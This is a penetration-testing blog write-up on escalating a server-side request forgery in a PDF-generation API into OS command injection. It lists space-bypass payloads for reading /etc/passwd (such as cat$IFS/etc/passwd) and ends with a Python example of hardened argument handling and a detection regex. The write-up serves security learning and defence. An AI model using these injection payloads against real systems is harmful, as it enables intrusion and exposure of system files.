Web Application Penetration Testing

An unknown Linux secret that turned SSRF into OS Command injection

A weird approach to escalate the Server-Side Request Forgery

What is SSRF:

What is Command Injection:

Let’s discuss how I found the issue:

https://www.example.com/api/v03/create_pdf?url=http://testsite.com&cookies=a&server=web

Look for the collaborator interaction:

https://www.example.com/api/v03/create_pdf?url=http://<burp-collaborator-link>&cookies=a&server=web

Try inline command execution:

[Figure: SSRF observation]
[Figure: SSRF to OS command injection]

The secret trick to bypass ‘space’

cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
[Figure: SSRF to OS command injection]
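The escalation above only works because the url parameter ends up inside a shell command line, where $IFS, brace expansion and redirection substitute for a space. The following is an added example (not code from the post or from the affected service) contrasting that construction with a hardened one: the renderer name render-pdf, the host allow-list and the assumption that the endpoint used shell-string interpolation are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Shell metacharacters plus the whitespace substitutes shown in the post:
# $IFS / ${IFS}, brace expansion {a,b}, and input redirection with <.
_SHELL_META = re.compile(r"""[\s;|`$<>(){}\[\]\\'"]""")

# Constructed allow-list: the only hosts this PDF service may fetch from.
ALLOWED_HOSTS = {"testsite.com", "www.testsite.com"}


def vulnerable_command_line(url: str) -> str:
    """How the endpoint is assumed to have built its command: the raw URL
    interpolated into a shell string (e.g. subprocess.run(cmd, shell=True)).
    Only returned here, never executed; it shows that $IFS reaches the shell."""
    return f"render-pdf {url} /tmp/out.pdf"


def validate_url(url: str) -> bool:
    """Accept only an http(s) URL to an allow-listed host, with no credentials
    and no shell metacharacters anywhere in the string."""
    if _SHELL_META.search(url):
        return False
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.hostname not in ALLOWED_HOSTS or parts.username or parts.password:
        return False
    return True


def hardened_argv(url: str) -> list:
    """Build the renderer invocation as an argv list so the URL is one argument
    and no shell ever parses it. Validation is defence in depth on top of that."""
    if not validate_url(url):
        raise ValueError("url rejected by allow-list/metacharacter check")
    return ["render-pdf", url, "/tmp/out.pdf"]


def is_shell_injection_attempt(url: str) -> bool:
    """Detection helper for WAF rules or log review: flags the space-bypass
    idioms from the post ($IFS, {a,b}, < /path) and command separators."""
    bypass = re.compile(r"\$\{?IFS\}?|\$\(|\{[^}]*,[^}]*\}|<\s*/|[;|`]")
    return bool(bypass.search(url))
```

Pass hardened_argv(url) to subprocess.run without shell=True; the metacharacter check then only needs to catch abuse for logging, not to protect the shell.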

https://www.buymeacoffee.com/secureitmania |blog.secureitmania.com| twitter @secureitmania |
